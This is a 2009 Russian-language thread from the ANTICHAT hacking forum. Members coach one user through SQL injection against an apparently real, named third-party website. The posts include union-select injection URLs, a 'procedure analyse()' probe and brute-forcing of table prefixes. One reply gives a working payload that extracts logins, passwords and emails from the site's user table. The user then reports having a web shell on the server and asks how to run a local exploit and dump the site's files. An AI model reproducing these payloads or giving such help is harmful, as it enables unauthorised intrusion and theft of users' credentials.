ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
23.04.2009, 01:08
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
PaCo
Не торопись с выводами. blind так составишь запросто, и я это описывал тут:
https://forum.antichat.ru/thread104591.html
Вопрос №6
И union можно, если немного подумать и потестить на локалке , попробуй 
|
|
|
23.04.2009, 08:38
|
|
Познающий
Регистрация: 11.02.2009
Сообщений: 98
Провел на форуме:
1446969
Репутация:
169
|
|
надо что-то типо:
http://site.ru/index.php?id=1+procedure+analyse()
Только работает оно не везде.. или у мну руки кривые=\
Вот почитай : клик |
|
|
|
23.04.2009, 11:07
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
http://site.ru/index.php?id=1+procedure+analyse()
Ага всё я узнал префикс...и нашёл тоблицу g_users
Но также там значения видимо с префиксом...
Можно ли как-то узнать эти значения? (пытался брутить то стандартному словорю SIPT4)
|
|
|
|
23.04.2009, 12:01
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
Возможно это поможет:
http://cr0w-at.blogspot.com/2009/03/mysql-4x.html
|
|
|
|
23.04.2009, 13:05
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Сообщение от [Raz0r]
Возможно это поможет:
http://cr0w-at.blogspot.com/2009/03/mysql-4x.html
Не помогает...
PHP код:
http://transsib-express.ru/index.php?id=344&nid=-198+union+select+1,2,3,4,5,6,7,8--+
таблички
cms_config
cms_group
cms_news
cms_users (поля gid uid)
Помогите вот на счёт этого весь день и парюсь...
Последний раз редактировалось Byrger; 23.04.2009 в 13:14..
|
|
|
|
23.04.2009, 15:07
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638
Репутация:
256
|
|
Сообщение от Byrger
Не помогает...
PHP код:
http://transsib-express.ru/index.php?id=344&nid=-198+union+select+1,2,3,4,5,6,7,8--+
таблички
cms_config
cms_group
cms_news
cms_users (поля gid uid)
Помогите вот на счёт этого весь день и парюсь... Собственно в чём проблема не пойму? Вывод получить чтоли? Или я чего то не понимаю?
|
|
|
|
23.04.2009, 15:16
|
|
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
Провел на форуме:
3009843
Репутация:
204
|
|
Подобрать колонку, в которой хрянтся пассы=\.
|
|
|
|
23.04.2009, 19:45
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Ух... все стандартные префиксы+колонки пробрутил...300мб ушло...
Может есть другие способы?
|
|
|
|
23.04.2009, 21:06
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Сообщение от Byrger
Ух... все стандартные префиксы+колонки пробрутил...300мб ушло...
Может есть другие способы?
http://transsib-express.ru/index.php?id=344&nid=-198+union+select+1,2,3,4,concat_ws(0x2F, _login,_pass,_mail),6,7,8+from+cms_users--+
Сообщение от VITАL
http://downloadportal.ru/10388-advanced-sql-injection-tricks-detali.html
А копирайты поставить ?
Последний раз редактировалось ElteRUS; 23.04.2009 в 21:11..
|
|
|
|
23.04.2009, 21:12
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Сообщение от ElteRUS
http://transsib-express.ru/index.php?id=344&nid=-198+union+select+1,2,3,4,concat_ws(0x2F, _login,_pass,_mail),6,7,8+from+cms_users--+
Лови ++
А тогда такой вопрос...
Есть шелл
Но на сервере не нашёл компилятора gcc в каталогах /sbin/ и /bin/ как быть?
Выполняя команду gcc Exploit.c -o Exploit ничего не происходит...
И как можно слить все файлы каталога с сайтом сразу?
Safe-mode: ON
Архивировать по средствам c99 не удаётся...
может возможно какойнить дампер на PHP залить туда? Если не сложно то какой
Последний раз редактировалось Byrger; 23.04.2009 в 22:19..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?1238873){kind=avatar}
![Отправить сообщение для [Raz0r] с помощью ICQ](fusion/misc/im_icq.gif)
Похожие темы
Линейный вид
